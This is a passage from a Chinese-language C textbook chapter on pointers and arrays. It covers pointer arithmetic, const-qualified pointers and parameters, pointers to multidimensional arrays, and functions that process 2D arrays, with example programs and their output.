data; p3 = moredata; printf(" *p1 = %d,  *p2 = %d,  *p3 = %d\n",*p1, *p2, *p3); printf("*p1++ = %d, *++p2 = %d, (*p3)++ = %d\n",*p1++, *++p2, (*p3)++); printf(" *p1 = %d,  *p2 = %d,  *p3 = %d\n",*p1, *p2, *p3); return 0; } 下面是该程序的输出: *p1 = 100,  *p2 = 100,   *p3 = 300 *p1++ = 100, *++p2 = 200, (*p3)++ = 300 *p1 = 200,  *p2 = 200,   *p3 = 301 只有(*p3)++改变了数组元素的值,其他两个操作分别把p1和p2指向数 组的下一个元素。 10.4.2 指针表示法和数组表示法 从以上分析可知,处理数组的函数实际上用指针作为参数,但是在编写 这样的函数时,可以选择是使用数组表示法还是指针表示法。如程序清单 680 10.10所示,使用数组表示法,让函数是处理数组的这一意图更加明显。另 外,许多其他语言的程序员对数组表示法更熟悉,如FORTRAN、Pascal、 Modula-2或BASIC。其他程序员可能更习惯使用指针表示法,觉得使用指针 更自然,如程序清单10.11所示。 至于C语言,ar[i]和*(ar+1)这两个表达式都是等价的。无论ar是数组名 还是指针变量,这两个表达式都没问题。但是,只有当ar是指针变量时,才 能使用ar++这样的表达式。 指针表示法(尤其与递增运算符一起使用时)更接近机器语言,因此一 些编译器在编译时能生成效率更高的代码。然而,许多程序员认为他们的主 要任务是确保代码正确、逻辑清晰,而代码优化应该留给编译器去做。 681 10.5 指针操作 可以对指针进行哪些操作?C提供了一些基本的指针操作,下面的程序 示例中演示了8种不同的操作。为了显示每种操作的结果,该程序打印了指 针的值(该指针指向的地址)、储存在指针指向地址上的值,以及指针自己 的地址。如果编译器不支持%p 转换说明,可以用%u 或%lu 代替%p;如果 编译器不支持用%td转换说明打印地址的差值,可以用%d或%ld来代替。 程序清单10.13演示了指针变量的 8种基本操作。除了这些操作,还可以 使用关系运算符来比较指针。 程序清单10.13 ptr_ops.c程序 // ptr_ops.c -- 指针操作 #include <stdio.h> int main(void) { int urn[5] = { 100, 200, 300, 400, 500 }; int * ptr1, *ptr2, *ptr3; ptr1 = urn;       // 把一个地址赋给指针 ptr2 = &urn[2];     // 把一个地址赋给指针 // 解引用指针,以及获得指针的地址 printf("pointer value, dereferenced pointer, pointer address:\n"); printf("ptr1 = %p, *ptr1 =%d, &ptr1 = %p\n", ptr1, *ptr1, &ptr1); // 指针加法 682 ptr3 = ptr1 + 4; printf("\nadding an int to a pointer:\n"); printf("ptr1 + 4 = %p, *(ptr1 + 4) = %d\n", ptr1 + 4, *(ptr1 + 4)); ptr1++;         // 递增指针 printf("\nvalues after ptr1++:\n"); printf("ptr1 = %p, *ptr1 =%d, &ptr1 = %p\n", ptr1, *ptr1, &ptr1); ptr2--;         // 递减指针 printf("\nvalues after --ptr2:\n"); printf("ptr2 = %p, *ptr2 = %d, &ptr2 = %p\n", ptr2, *ptr2, &ptr2); --ptr1;         // 恢复为初始值 ++ptr2;         // 恢复为初始值 printf("\nPointers reset to original values:\n"); printf("ptr1 = %p, ptr2 = %p\n", ptr1, ptr2); // 一个指针减去另一个指针 printf("\nsubtracting one pointer from another:\n"); printf("ptr2 = %p, ptr1 = %p, ptr2 - ptr1 = %td\n",  ptr2, ptr1, ptr2 - ptr1); // 一个指针减去一个整数 printf("\nsubtracting an int from a pointer:\n"); 683 printf("ptr3 = %p, ptr3 - 2 = %p\n", ptr3, ptr3 - 2); return 0; } 下面是我们的系统运行该程序后的输出: pointer value, dereferenced pointer, pointer address: ptr1 = 0x7fff5fbff8d0, *ptr1 =100, &ptr1 = 0x7fff5fbff8c8 adding an int to a pointer: ptr1 + 4 = 0x7fff5fbff8e0, *(ptr1 + 4) = 500 values after ptr1++: ptr1 = 0x7fff5fbff8d4, *ptr1 =200, &ptr1 = 0x7fff5fbff8c8 values after --ptr2: ptr2 = 0x7fff5fbff8d4, *ptr2 = 200, &ptr2 = 0x7fff5fbff8c0 Pointers reset to original values: ptr1 = 0x7fff5fbff8d0, ptr2 = 0x7fff5fbff8d8 subtracting one pointer from another: ptr2 = 0x7fff5fbff8d8, ptr1 = 0x7fff5fbff8d0, ptr2 - ptr1 = 2 subtracting an int from a pointer: ptr3 = 0x7fff5fbff8e0, ptr3 - 2 = 0x7fff5fbff8d8 下面分别描述了指针变量的基本操作。 684 赋值:可以把地址赋给指针。例如,用数组名、带地址运算符(&)的 变量名、另一个指针进行赋值。在该例中,把urn数组的首地址赋给了ptr1, 该地址的编号恰好是0x7fff5fbff8d0。变量ptr2获得数组urn的第3个元素 (urn[2])的地址。注意,地址应该和指针类型兼容。也就是说,不能把 double类型的地址赋给指向int的指针,至少要避免不明智的类型转换。 C99/C11已经强制不允许这样做。 解引用:*运算符给出指针指向地址上储存的值。因此,*ptr1的初值是 100,该值储存在编号为0x7fff5fbff8d0的地址上。 取址:和所有变量一样,指针变量也有自己的地址和值。对指针而言, &运算符给出指针本身的地址。本例中,ptr1 储存在内存编号为 0x7fff5fbff8c8 的地址上,该存储单元储存的内容是0x7fff5fbff8d0,即urn的地 址。因此&ptr1是指向ptr1的指针,而ptr1是指向utn[0]的指针。 指针与整数相加:可以使用+运算符把指针与整数相加,或整数与指针 相加。无论哪种情况,整数都会和指针所指向类型的大小(以字节为单位) 相乘,然后把结果与初始地址相加。因此ptr1 +4与&urn[4]等价。如果相加 的结果超出了初始指针指向的数组范围,计算结果则是未定义的。除非正好 超过数组末尾第一个位置,C保证该指针有效。 递增指针:递增指向数组元素的指针可以让该指针移动至数组的下一个 元素。因此,ptr1++相当于把ptr1的值加上4(我们的系统中int为4字节), ptr1指向urn[1](见图10.4,该图中使用了简化的地址)。现在ptr1的值是 0x7fff5fbff8d4(数组的下一个元素的地址),*ptr的值为200(即urn[1]的 值)。注意,ptr1本身的地址仍是 0x7fff5fbff8c8。毕竟,变量不会因为值发 生变化就移动位置。 685 图10.4 递增指向int的指针 指针减去一个整数:可以使用-运算符从一个指针中减去一个整数。指 针必须是第1个运算对象,整数是第 2 个运算对象。该整数将乘以指针指向 类型的大小(以字节为单位),然后用初始地址减去乘积。所以ptr3 - 2与 &urn[2]等价,因为ptr3指向的是&arn[4]。如果相减的结果超出了初始指针所 指向数组的范围,计算结果则是未定义的。除非正好超过数组末尾第一个位 置,C保证该指针有效。 递减指针:当然,除了递增指针还可以递减指针。在本例中,递减ptr3 使其指向数组的第2个元素而不是第3个元素。前缀或后缀的递增和递减运算 符都可以使用。注意,在重置ptr1和ptr2前,它们都指向相同的元素urn[1]。 指针求差:可以计算两个指针的差值。通常,求差的两个指针分别指向 同一个数组的不同元素,通过计算求出两元素之间的距离。差值的单位与数 组类型的单位相同。例如,程序清单10.13的输出中,ptr2 - ptr1得2,意思是 这两个指针所指向的两个元素相隔两个int,而不是2字节。只要两个指针都 指向相同的数组(或者其中一个指针指向数组后面的第 1 个地址),C 都能 保证相减运算有效。如果指向两个不同数组的指针进行求差运算可能会得出 一个值,或者导致运行时错误。 比较:使用关系运算符可以比较两个指针的值,前提是两个指针都指向 686 相同类型的对象。 注意,这里的减法有两种。可以用一个指针减去另一个指针得到一个整 数,或者用一个指针减去一个整数得到另一个指针。 在递增或递减指针时还要注意一些问题。编译器不会检查指针是否仍指 向数组元素。C 只能保证指向数组任意元素的指针和指向数组后面第 1 个位 置的指针有效。但是,如果递增或递减一个指针后超出了这个范围,则是未 定义的。另外,可以解引用指向数组任意元素的指针。但是,即使指针指向 数组后面一个位置是有效的,也能解引用这样的越界指针。 解引用未初始化的指针 说到注意事项,一定要牢记一点:千万不要解引用未初始化的指针。例 如,考虑下面的例子: int * pt;// 未初始化的指针 *pt = 5;   // 严重的错误 为何不行?第2行的意思是把5储存在pt指向的位置。但是pt未被初始 化,其值是一个随机值,所以不知道5将储存在何处。这可能不会出什么 错,也可能会擦写数据或代码,或者导致程序崩溃。切记:创建一个指针 时,系统只分配了储存指针本身的内存,并未分配储存数据的内存。因此, 在使用指针之前,必须先用已分配的地址初始化它。例如,可以用一个现有 变量的地址初始化该指针(使用带指针形参的函数时,就属于这种情况)。 或者还可以使用第12章将介绍的malloc()函数先分配内存。无论如何,使用 指针时一定要注意,不要解引用未初始化的指针! double * pd; // 未初始化的指针 *pd = 2.4;  // 不要这样做 假设 687 int urn[3]; int * ptr1, * ptr2; 下面是一些有效和无效的语句: 有效语句          无效语句 ptr1++;             urn++; ptr2 = ptr1 + 2;      ptr2 = ptr2 + ptr1; ptr2 = urn + 1;       ptr2 = urn * ptr1; 基于这些有效的操作,C 程序员创建了指针数组、函数指针、指向指针 的指针数组、指向函数的指针数组等。别紧张,接下来我们将根据已学的内 容介绍指针的一些基本用法。指针的第 1 个基本用法是在函数间传递信息。 前面学过,如果希望在被调函数中改变主调函数的变量,必须使用指针。指 针的第 2 个基本用法是用在处理数组的函数中。下面我们再来看一个使用函 数和数组的编程示例。 688 10.6 保护数组中的数据 编写一个处理基本类型(如,int)的函数时,要选择是传递int类型的值 还是传递指向int的指针。通常都是直接传递数值,只有程序需要在函数中改 变该数值时,才会传递指针。对于数组别无选择,必须传递指针,因为这样 做效率高。如果一个函数按值传递数组,则必须分配足够的空间来储存原数 组的副本,然后把原数组所有的数据拷贝至新的数组中。如果把数组的地址 传递给函数,让函数直接处理原数组则效率要高。 传递地址会导致一些问题。C 通常都按值传递数据,因为这样做可以保 证数据的完整性。如果函数使用的是原始数据的副本,就不会意外修改原始 数据。但是,处理数组的函数通常都需要使用原始数据,因此这样的函数可 以修改原数组。有时,这正是我们需要的。例如,下面的函数给数组的每个 元素都加上一个相同的值: void add_to(double ar[], int n, double val) { int i; for (i = 0; i < n; i++) ar[i] += val; } 因此,调用该函数后,prices数组中的每个元素的值都增加了2.5: add_to(prices, 100, 2.50); 该函数修改了数组中的数据。之所以可以这样做,是因为函数通过指针 直接使用了原始数据。 689 然而,其他函数并不需要修改数据。例如,下面的函数计算数组中所有 元素之和,它不用改变数组的数据。但是,由于ar实际上是一个指针,所以 编程错误可能会破坏原始数据。例如,下面示例中的ar[i]++会导致数组中每 个元素的值都加1: int sum(int ar[], int n) // 错误的代码 { int i; int total = 0; for( i = 0; i < n; i++) total += ar[i]++; // 错误递增了每个元素的值 return total; } 10.6.1 对形式参数使用const 在K&R C的年代,避免类似错误的唯一方法是提高警惕。ANSI C提供 了一种预防手段。如果函数的意图不是修改数组中的数据内容,那么在函数 原型和函数定义中声明形式参数时应使用关键字const。例如,sum()函数的 原型和定义如下: int sum(const int ar[], int n); /* 函数原型 */ int sum(const int ar[], int n) /* 函数定义 */ { int i; 690 int total = 0; for( i = 0; i < n; i++) total += ar[i]; return total; } 以上代码中的const告诉编译器,该函数不能修改ar指向的数组中的内 容。如果在函数中不小心使用类似ar[i]++的表达式,编译器会捕获这个错 误,并生成一条错误信息。 这里一定要理解,这样使用const并不是要求原数组是常量,而是该函 数在处理数组时将其视为常量,不可更改。这样使用const可以保护数组的 数据不被修改,就像按值传递可以保护基本数据类型的原始值不被改变一 样。一般而言,如果编写的函数需要修改数组,在声明数组形参时则不使用 const;如果编写的函数不用修改数组,那么在声明数组形参时最好使用 const。 程序清单10.14的程序中,一个函数显示数组的内容,另一个函数给数 组每个元素都乘以一个给定值。因为第1个函数不用改变数组,所以在声明 数组形参时使用了const;而第2个函数需要修改数组元素的值,所以不使用 const。 程序清单10.14 arf.c程序 /* arf.c -- 处理数组的函数 */ #include <stdio.h> #define SIZE 5 void show_array(const double ar[], int n); 691 void mult_array(double ar[], int n, double mult); int main(void) { double dip[SIZE] = { 20.0, 17.66, 8.2, 15.3, 22.22 }; printf("The original dip array:\n"); show_array(dip, SIZE); mult_array(dip, SIZE, 2.5); printf("The dip array after calling mult_array():\n"); show_array(dip, SIZE); return 0; } /* 显示数组的内容 */ void show_array(const double ar[], int n) { int i; for (i = 0; i < n; i++) printf("%8.3f ", ar[i]); putchar('\n'); } 692 /* 把数组的每个元素都乘以相同的值 */ void mult_array(double ar[], int n, double mult) { int i; for (i = 0; i < n; i++) ar[i] *= mult; } 下面是该程序的输出: The original dip array: 20.000  17.660   8.200   15.300  22.220 The dip array after calling mult_array(): 50.000  44.150   20.500  38.250  55.550 注意该程序中两个函数的返回类型都是void。虽然mult_array()函数更新 了dip数组的值,但是并未使用return机制。 10.6.2 const的其他内容 我们在前面使用const创建过变量: const double PI = 3.14159; 虽然用#define指令可以创建类似功能的符号常量,但是const的用法更加 灵活。可以创建const数组、const指针和指向const的指针。 程序清单10.4演示了如何使用const关键字保护数组: 693 #define MONTHS 12 ... const int days[MONTHS] = {31,28,31,30,31,30,31,31,30,31,30,31}; 如果程序稍后尝试改变数组元素的值,编译器将生成一个编译期错误消 息: days[9] = 44;   /* 编译错误 */ 指向const的指针不能用于改变值。考虑下面的代码: double rates[5] = {88.99, 100.12, 59.45, 183.11, 340.5}; const double * pd = rates;   // pd指向数组的首元素 第2行代码把pd指向的double类型的值声明为const,这表明不能使用pd 来更改它所指向的值: *pd = 29.89;   // 不允许 pd[2] = 222.22;  //不允许 rates[0] = 99.99; // 允许,因为rates未被const限定 无论是使用指针表示法还是数组表示法,都不允许使用pd修改它所指向 数据的值。但是要注意,因为rates并未被声明为const,所以仍然可以通过 rates修改元素的值。另外,可以让pd指向别处: pd++; /* 让pd指向rates[1] -- 没问题 */ 指向 const 的指针通常用于函数形参中,表明该函数不会使用指针改变 数据。例如,程序清单 10.14中的show_array()函数原型如下: void show_array(const double *ar, int n); 694 关于指针赋值和const需要注意一些规则。首先,把const数据或非const 数据的地址初始化为指向const的指针或为其赋值是合法的: double rates[5] = {88.99, 100.12, 59.45, 183.11, 340.5}; const double locked[4] = {0.08, 0.075, 0.0725, 0.07}; const double * pc = rates; // 有效 pc = locked;         //有效 pc = &rates[3];       //有效 然而,只能把非const数据的地址赋给普通指针: double rates[5] = {88.99, 100.12, 59.45, 183.11, 340.5}; const double locked[4] = {0.08, 0.075, 0.0725, 0.07}; double * pnc = rates; // 有效 pnc = locked;      // 无效 pnc = &rates[3];    // 有效 这个规则非常合理。否则,通过指针就能改变const数组中的数据。 应用以上规则的例子,如 show_array()函数可以接受普通数组名和 const 数组名作为参数,因为这两种参数都可以用来初始化指向const的指针: show_array(rates, 5);    // 有效 show_array(locked, 4);   // 有效 因此,对函数的形参使用const不仅能保护数据,还能让函数处理const 数组。 695 另外,不应该把const数组名作为实参传递给mult_array()这样的函数: mult_array(rates, 5, 1.2);   // 有效 mult_array(locked, 4, 1.2);   // 不要这样做 C标准规定,使用非const标识符(如,mult_arry()的形参ar)修改const 数据(如,locked)导致的结果是未定义的。 const还有其他的用法。例如,可以声明并初始化一个不能指向别处的 指针,关键是const的位置: double rates[5] = {88.99, 100.12, 59.45, 183.11, 340.5}; double * const pc = rates; // pc指向数组的开始 pc = &rates[2];       // 不允许,因为该指针不能指向别处 *pc = 92.99;        // 没问题 -- 更改rates[0]的值 可以用这种指针修改它所指向的值,但是它只能指向初始化时设置的地 址。 最后,在创建指针时还可以使用const两次,该指针既不能更改它所指 向的地址,也不能修改指向地址上的值: double rates[5] = {88.99, 100.12, 59.45, 183.11, 340.5}; const double * const pc = rates; pc = &rates[2];  //不允许 *pc = 92.99;   //不允许 696 10.7 指针和多维数组 指针和多维数组有什么关系?为什么要了解它们的关系?处理多维数组 的函数要用到指针,所以在使用这种函数之前,先要更深入地学习指针。至 于第 1 个问题,我们通过几个示例来回答。为简化讨论,我们使用较小的数 组。假设有下面的声明: int zippo[4][2]; /* 内含int数组的数组 */ 然后数组名zippo是该数组首元素的地址。在本例中,zippo的首元素是 一个内含两个int值的数组,所以zippo是这个内含两个int值的数组的地址。 下面,我们从指针的属性进一步分析。 因为zippo是数组首元素的地址,所以zippo的值和&zippo[0]的值相同。 而zippo[0]本身是一个内含两个整数的数组,所以zippo[0]的值和它首元素 (一个整数)的地址(即&zippo[0][0]的值)相同。简而言之,zippo[0]是一 个占用一个int大小对象的地址,而zippo是一个占用两个int大小对象的地 址。由于这个整数和内含两个整数的数组都开始于同一个地址,所以zippo 和zippo[0]的值相同。 给指针或地址加1,其值会增加对应类型大小的数值。在这方面,zippo 和zippo[0]不同,因为zippo指向的对象占用了两个int大小,而zippo[0]指向的 对象只占用一个int大小。因此, zippo + 1和zippo[0] + 1的值不同。 解引用一个指针(在指针前使用*运算符)或在数组名后使用带下标的 []运算符,得到引用对象代表的值。因为zippo[0]是该数组首元素(zippo[0] [0])的地址,所以*(zippo[0])表示储存在zippo[0][0]上的值(即一个int类型 的值)。与此类似,*zippo代表该数组首元素(zippo[0])的值,但是 zippo[0]本身是一个int类型值的地址。该值的地址是&zippo[0][0],所以 *zippo就是&zippo[0][0]。对两个表达式应用解引用运算符表明,**zippo与 *&zippo[0][0]等价,这相当于zippo[0][0],即一个int类型的值。简而言之, zippo是地址的地址,必须解引用两次才能获得原始值。地址的地址或指针 697 的指针是就是双重间接(double indirection)的例子。 显然,增加数组维数会增加指针的复杂度。现在,大部分初学者都开始 意识到指针为什么是 C 语言中最难的部分。认真思考上述内容,看看是否 能用所学的知识解释程序清单10.15中的程序。该程序显示了一些地址值和 数组的内容。 程序清单10.15 zippo1.c程序 /* zippo1.c -- zippo的相关信息 */ #include <stdio.h> int main(void) { int zippo[4][2] = { { 2, 4 }, { 6, 8 }, { 1, 3 },  { 5, 7 } }; printf("  zippo = %p,   zippo + 1 = %p\n",zippo, zippo  + 1); printf("zippo[0] = %p, zippo[0] + 1 = %p\n",zippo[0],  zippo[0] + 1); printf(" *zippo = %p,  *zippo + 1 = %p\n",*zippo, *zippo + 1); printf("zippo[0][0] = %d\n", zippo[0][0]); printf(" *zippo[0] = %d\n", *zippo[0]); printf("  **zippo = %d\n", **zippo); printf("    zippo[2][1] = %d\n", zippo[2][1]); 698 printf("*(*(zippo+2) + 1) = %d\n", *(*(zippo + 2) + 1)); return 0; } 下面是我们的系统运行该程序后的输出: zippo = 0x0064fd38,     zippo + 1 = 0x0064fd40 zippo[0]= 0x0064fd38,  zippo[0] + 1 = 0x0064fd3c *zippo = 0x0064fd38,   *zippo + 1 = 0x0064fd3c zippo[0][0] = 2 *zippo[0] = 2 **zippo = 2 zippo[2][1] = 3 *(*(zippo+2) + 1) = 3 其他系统显示的地址值和地址形式可能不同,但是地址之间的关系与以 上输出相同。该输出显示了二维数组zippo的地址和一维数组zippo[0]的地址 相同。它们的地址都是各自数组首元素的地址,因而与&zippo[0][0]的值也 相同。 尽管如此,它们也有差别。在我们的系统中,int是4 字节。前面讨论 过,zippo[0]指向一个4 字节的数据对象。zippo[0]加1,其值加4(十六进制 中,38+4得3c)。数组名zippo 是一个内含2个int类型值的数组的地址,所以 zippo指向一个8字节的数据对象。因此,zippo加1,它所指向的地址加8字节 (十六进制中,38+8得40)。 该程序演示了zippo[0]和*zippo完全相同,实际上确实如此。然后,对 699 二维数组名解引用两次,得到储存在数组中的值。使用两个间接运算符 (*)或者使用两对方括号([])都能获得该值(还可以使用一个*和一对 [],但是我们暂不讨论这么多情况)。 要特别注意,与 zippo[2][1]等价的指针表示法是*(*(zippo+2) + 1)。看上 去比较复杂,应最好能理解。下面列出了理解该表达式的思路: 以上分析并不是为了说明用指针表示法(*(*(zippo+2) + 1))代替数组 表示法(zippo[2][1]),而是提示读者,如果程序恰巧使用一个指向二维数 组的指针,而且要通过该指针获取值时,最好用简单的数组表示法,而不是 指针表示法。 图10.5以另一种视图演示了数组地址、数组内容和指针之间的关系。 图10.5 数组的数组 10.7.1 指向多维数组的指针 如何声明一个指针变量pz指向一个二维数组(如,zippo)?在编写处 700 理类似zippo这样的二维数组时会用到这样的指针。把指针声明为指向int的 类型还不够。因为指向int只能与zippo[0]的类型匹配,说明该指针指向一个 int类型的值。但是zippo是它首元素的地址,该元素是一个内含两个int类型 值的一维数组。因此,pz必须指向一个内含两个int类型值的数组,而不是指 向一个int类型值,其声明如下: int (* pz)[2];  // pz指向一个内含两个int类型值的数组 以上代码把pz声明为指向一个数组的指针,该数组内含两个int类型值。 为什么要在声明中使用圆括号?因为[]的优先级高于*。考虑下面的声明: int * pax[2];   // pax是一个内含两个指针元素的数组,每个元素都指 向int的指针 由于[]优先级高,先与pax结合,所以pax成为一个内含两个元素的数 组。然后*表示pax数组内含两个指针。最后,int表示pax数组中的指针都指 向int类型的值。因此,这行代码声明了两个指向int的指针。而前面有圆括号 的版本,*先与pz结合,因此声明的是一个指向数组(内含两个int类型的 值)的指针。程序清单10.16演示了如何使用指向二维数组的指针。 程序清单10.16 zippo2.c程序 /* zippo2.c -- 通过指针获取zippo的信息 */ #include <stdio.h> int main(void) { int zippo[4][2] = { { 2, 4 }, { 6, 8 }, { 1, 3 },  { 5, 7 } }; int(*pz)[2]; 701 pz = zippo; printf("  pz = %p,   pz + 1 = %p\n",   pz, pz + 1); printf("pz[0] = %p, pz[0] + 1 = %p\n",  pz[0], pz[0] + 1); printf(" *pz = %p,  *pz + 1 = %p\n",  *pz, *pz + 1); printf("pz[0][0] = %d\n", pz[0][0]); printf(" *pz[0] = %d\n", *pz[0]); printf("  **pz = %d\n", **pz); printf("    pz[2][1] = %d\n", pz[2][1]); printf("*(*(pz+2) + 1) = %d\n", *(*(pz + 2) + 1)); return 0; } 下面是该程序的输出: pz = 0x0064fd38,    pz + 1 = 0x0064fd40 pz[0] = 0x0064fd38,  pz[0] + 1 = 0x0064fd3c *pz = 0x0064fd38,  *pz + 1 = 0x0064fd3c pz[0][0] = 2 *pz[0] = 2 **pz = 2 pz[2][1] = 3 702 *(*(pz+2) + 1) = 3 系统不同,输出的地址可能不同,但是地址之间的关系相同。如前所 述,虽然pz是一个指针,不是数组名,但是也可以使用 pz[2][1]这样的写 法。可以用数组表示法或指针表示法来表示一个数组元素,既可以使用数组 名,也可以使用指针名: zippo[m][n] == *(*(zippo + m) + n) pz[m][n] == *(*(pz + m) + n) 10.7.2 指针的兼容性 指针之间的赋值比数值类型之间的赋值要严格。例如,不用类型转换就 可以把 int 类型的值赋给double类型的变量,但是两个类型的指针不能这样 做。 int n = 5; double x; int * p1 = &n; double * pd = &x; x = n;       // 隐式类型转换 pd = p1;      // 编译时错误 更复杂的类型也是如此。假设有如下声明: int * pt; int (*pa)[3]; int ar1[2][3]; 703 int ar2[3][2]; int **p2; // 一个指向指针的指针 有如下的语句: pt = &ar1[0][0]; // 都是指向int的指针 pt = ar1[0];    // 都是指向int的指针 pt = ar1;      // 无效 pa = ar1;      // 都是指向内含3个int类型元素数组的指针 pa = ar2;      // 无效 p2 = &pt;     // both pointer-to-int * *p2 = ar2[0];   // 都是指向int的指针 p2 = ar2;      // 无效 注意,以上无效的赋值表达式语句中涉及的两个指针都是指向不同的类 型。例如,pt 指向一个 int类型值,而ar1指向一个内含3和int类型元素的数 组。类似地,pa指向一个内含2个int类型元素的数组,所以它与ar1的类型兼 容,但是ar2指向一个内含2个int类型元素的数组,所以pa与ar2不兼容。 上面的最后两个例子有些棘手。变量p2是指向指针的指针,它指向的指 针指向int,而ar2是指向数组的指针,该数组内含2个int类型的元素。所以, p2和ar2的类型不同,不能把ar2赋给p2。但是,*p2是指向int的指针,与 ar2[0]兼容。因为ar2[0]是指向该数组首元素(ar2[0][0])的指针,所以 ar2[0]也是指向int的指针。 一般而言,多重解引用让人费解。例如,考虑下面的代码: int x = 20; 704 const int y = 23; int * p1 = &x; const int * p2 = &y; const int ** pp2; p1 = p2;    // 不安全 -- 把const指针赋给非const指针 p2 = p1;    // 有效 -- 把非const指针赋给const指针 pp2 = &p1;  // 不安全 –- 嵌套指针类型赋值 前面提到过,把const指针赋给非const指针不安全,因为这样可以使用 新的指针改变const指针指向的数据。编译器在编译代码时,可能会给出警 告,执行这样的代码是未定义的。但是把非const指针赋给const指针没问 题,前提是只进行一级解引用: p2 = p1; // 有效 -- 把非const指针赋给const指针 但是进行两级解引用时,这样的赋值也不安全,例如,考虑下面的代 码: const int **pp2; int *p1; const int n = 13; pp2 = &p1;  // 允许,但是这导致const限定符失效(根据第1行代码, 不能通过*pp2修改它所指向的内容) *pp2 = &n;  // 有效,两者都声明为const,但是这将导致p1指向 n(*pp2已被修改) 705 *p1 = 10;//有效,但是这将改变n的值(但是根据第3行代码,不能修改n 的值) 发生了什么?如前所示,标准规定了通过非const指针更改const数据是 未定义的。例如,在Terminal中(OS X对底层UNIX系统的访问)使用gcc编 译包含以上代码的小程序,导致n最终的值是13,但是在相同系统下使用 clang来编译,n最终的值是10。两个编译器都给出指针类型不兼容的警告。 当然,可以忽略这些警告,但是最好不要相信该程序运行的结果,这些结果 都是未定义的。 C const和C++ const C和C++中const的用法很相似,但是并不完全相同。区别之一是, C++允许在声明数组大小时使用const整数,而C却不允许。区别之二是, C++的指针赋值检查更严格: const int y; const int * p2 = &y; int * p1; p1 = p2; // C++中不允许这样做,但是C可能只给出警告 C++不允许把const指针赋给非const指针。而C则允许这样做,但是如果 通过p1更改y,其行为是未定义的。 10.7.3 函数和多维数组 如果要编写处理二维数组的函数,首先要能正确地理解指针才能写出声 明函数的形参。在函数体中,通常使用数组表示法进行相关操作。 下面,我们编写一个处理二维数组的函数。一种方法是,利用for循环 把处理一维数组的函数应用到二维数组的每一行。如下所示: 706 int junk[3][4] = { {2,4,5,8}, {3,5,6,9}, {12,10,8,6} }; int i, j; int total = 0; for (i = 0; i < 3 ; i++) total += sum(junk[i], 4); // junk[i]是一维数组 记住,如果 junk 是二维数组,junk[i]就是一维数组,可将其视为二维数 组的一行。这里,sum()函数计算二维数组的每行的总和,然后for循环再把 每行的总和加起来。 然而,这种方法无法记录行和列的信息。用这种方法计算总和,行和列 的信息并不重要。但如果每行代表一年,每列代表一个月,就还需要一个函 数计算某列的总和。该函数要知道行和列的信息,可以通过声明正确类型的 形参变量来完成,以便函数能正确地传递数组。在这种情况下,数组 junk 是一个内含 3个数组元素的数组,每个元素是内含4个int类型值的数组(即 junk是一个3行4列的二维数组)。通过前面的讨论可知,这表明junk是一个 指向数组(内含4个int类型值)的指针。可以这样声明函数的形参: void somefunction( int (* pt)[4] ); 另外,如果当且仅当pt是一个函数的形式参数时,可以这样声明: void somefunction( int pt[][4] ); 注意,第1个方括号是空的。空的方括号表明pt是一个指针。这样的变 量稍后可以用作相同方法作为junk。下面的程序示例中就是这样做的,如程 序清单10.17所示。注意该程序清单演示了3种等价的原型语法。 程序清单10.17 array2d.c程序 // array2d.c -- 处理二维数组的函数 707 #include <stdio.h> #define ROWS 3 #define COLS 4 void sum_rows(int ar[][COLS], int rows); void sum_cols(int [][COLS], int);    // 省略形参名,没问题 int sum2d(int(*ar)[COLS], int rows);  // 另一种语法 int main(void) { int junk[ROWS][COLS] = { { 2, 4, 6, 8 }, { 3, 5, 7, 9 }, { 12, 10, 8, 6 } }; sum_rows(junk, ROWS); sum_cols(junk, ROWS); printf("Sum of all elements = %d\n", sum2d(junk, ROWS)); return 0; } void sum_rows(int ar[][COLS], int rows) 708 { int r; int c; int tot; for (r = 0; r < rows; r++) { tot = 0; for (c = 0; c < COLS; c++) tot += ar[r][c]; printf("row %d: sum = %d\n", r, tot); } } void sum_cols(int ar[][COLS], int rows) { int r; int c; int tot; for (c = 0; c < COLS; c++) { 709 tot = 0; for (r = 0; r < rows; r++) tot += ar[r][c]; printf("col %d: sum = %d\n", c, tot); } } int sum2d(int ar[][COLS], int rows) { int r; int c; int tot = 0; for (r = 0; r < rows; r++) for (c = 0; c < COLS; c++) tot += ar[r][c]; return tot; } 该程序的输出如下: row 0: sum = 20 row 1: sum = 24 710 row 2: sum = 36 col 0: sum = 17 col 1: sum = 19 col 2: sum = 21 col 3: sum = 23 Sum of all elements = 80 程序清单10.17中的程序把数组名junk(即,指向数组首元素的指针,首 元素是子数组)和符号常量ROWS(代表行数3)作为参数传递给函数。每 个函数都把ar视为内含数组元素(每个元素是内含4个int类型值的数组)的 数组。列数内置在函数体中,但是行数靠函数传递得到。如果传入函数的行 数是12,那么函数要处理的是12×4的数组。因为rows是元素的个数,然 而,因为每个元素都是数组,或者视为一行,rows也可以看成是行数。 注意,ar和main()中的junk都使用数组表示法。因为ar和junk的类型相 同,它们都是指向内含4个int类型值的数组的指针。 注意,下面的声明不正确: int sum2(int ar[][], int rows); // 错误的声明 前面介绍过,编译器会把数组表示法转换成指针表示法。例如,编译器 会把 ar[1]转换成 ar+1。编译器对ar+1求值,要知道ar所指向的对象大小。下 面的声明: int sum2(int ar[][4], int rows);  // 有效声明 表示ar指向一个内含4个int类型值的数组(在我们的系统中,ar指向的 对象占16字节),所以ar+1的意思是“该地址加上16字节”。如果第2对方括 号是空的,编译器就不知道该怎样处理。 711 也可以在第1对方括号中写上大小,如下所示,但是编译器会忽略该 值: int sum2(int ar[3][4], int rows); // 有效声明,但是3将被忽略 与使用typedef(第5章和第14章中讨论)相比,这种形式方便得多: typedef int arr4[4];         // arr4是一个内含 4 个int的数组 typedef arr4 arr3x4[3];        // arr3x4 是一个内含3个 arr4的数 组 int sum2(arr3x4 ar, int rows);   // 与下面的声明相同 int sum2(int ar[3][4], int rows);  // 与下面的声明相同 int sum2(int ar[][4], int rows);  // 标准形式 一般而言,声明一个指向N维数组的指针时,只能省略最左边方括号中 的值: int sum4d(int ar[][12][20][30], int rows); 因为第1对方括号只用于表明这是一个指针,而其他的方括号则用于描 述指针所指向数据对象的类型。下面的声明与该声明等价: int sum4d(int (*ar)[12][20][30], int rows); // ar是一个指针 这里,ar指向一个12×20×30的int数组。 712 10.8 变长数组(VLA) 读者在学习处理二维数组的函数中可能不太理解,为何只把数组的行数 作为函数的形参,而列数却内置在函数体内。例如,函数定义如下: #define COLS 4 int sum2d(int ar[][COLS], int rows) { int r; int c; int tot = 0; for (r = 0; r < rows; r++) for (c = 0; c < COLS; c++) tot += ar[r][c]; return tot; } 假设声明了下列数组: int array1[5][4]; int array2[100][4]; int array3[2][4]; 